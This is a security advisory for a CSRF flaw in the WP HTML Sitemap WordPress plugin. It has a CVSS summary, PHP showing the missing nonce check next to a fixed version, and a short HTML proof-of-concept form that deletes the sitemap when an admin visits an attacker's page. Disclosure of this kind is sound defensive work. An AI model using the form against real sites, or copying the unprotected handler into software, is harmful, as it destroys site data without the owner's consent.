CVSS Summary
| Score | 4.3 Medium |
|---|---|
| Vector | Network |
| Complexity | Medium |
| Authentication | None |
| Confidentiality | None |
| Integrity | Partial |
| Availability | None |
Last revised:
A CSRF vulnerability exists that allows an attacker to delete the sitemap if a logged-in admin user visits a page of the attacker’s choosing that submits the form below.
Line 202 of inc/AdminPage.php carries the comment “// check whether form was just submitted”, but the if/elseif statements that follow only test which button was pressed; no nonce is verified (no check_admin_referer() or wp_verify_nonce() call). The form in question is printed in wp_html_sitemap_AdminPage::createSitemapForm() around line 146 of the same file.
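To make the missing check concrete, the following is an added illustration of the vulnerable pattern described above next to a nonce-protected version. It is not the plugin’s own code: the function names, the `example_` option name and the nonce action/field names are assumptions standing in for the real logic in inc/AdminPage.php.

```php
<?php
// Added illustration, not code from the WP HTML Sitemap plugin.
// Names prefixed "example_" are assumptions.

// Vulnerable pattern (as described in the advisory): the handler only looks at
// which submit button is present in $_POST. Any third-party page that POSTs to
// options-general.php while an admin is logged in can trigger the delete,
// because the browser attaches the admin's cookies automatically.
function example_handle_sitemap_form_vulnerable() {
    if ( isset( $_POST['deleteSitemap'] ) ) {
        delete_option( 'example_html_sitemap' ); // assumed option name
    } elseif ( isset( $_POST['generateSitemap'] ) ) {
        // other buttons handled the same way, still with no nonce verified
    }
}

// Hardened pattern: the form carries a nonce tied to the current user's
// session, and the handler refuses to act unless that nonce verifies.
function example_render_sitemap_form() {
    ?>
    <form method="post"
          action="<?php echo esc_url( admin_url( 'options-general.php?page=wp-html-sitemap&tab=general' ) ); ?>">
        <?php wp_nonce_field( 'example_sitemap_action', 'example_sitemap_nonce' ); ?>
        <input type="submit" name="deleteSitemap" class="button"
               value="<?php echo esc_attr( 'Delete Sitemap' ); ?>">
    </form>
    <?php
}

function example_handle_sitemap_form_hardened() {
    if ( 'POST' !== $_SERVER['REQUEST_METHOD'] ) {
        return;
    }
    // Capability check: only users allowed to manage options may proceed.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.' );
    }
    // Nonce check: verifies $_POST['example_sitemap_nonce'] against the
    // 'example_sitemap_action' nonce for the current user. A form hosted on an
    // attacker's site cannot know this value, so check_admin_referer() dies
    // ("The link you followed has expired") before the delete runs.
    check_admin_referer( 'example_sitemap_action', 'example_sitemap_nonce' );

    if ( isset( $_POST['deleteSitemap'] ) ) {
        delete_option( 'example_html_sitemap' );
    } elseif ( isset( $_POST['generateSitemap'] ) ) {
        // other buttons, now behind the same nonce and capability checks
    }
}
```

The capability check alone would not help here: the victim is an administrator, so the request already passes it. The nonce is what distinguishes a form the site itself rendered from one the attacker hosted.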
Current state: Reported
This form deletes the sitemap without requiring a nonce value:
```html
<form action="http://not-a-real-site.local/wp-admin/options-general.php?page=wp-html-sitemap&tab=general" method="POST">
    <input type="text" name="deleteSitemap" value="Delete Sitemap">
    <input type="submit">
</form>
```
Disable the plugin until a fix is available.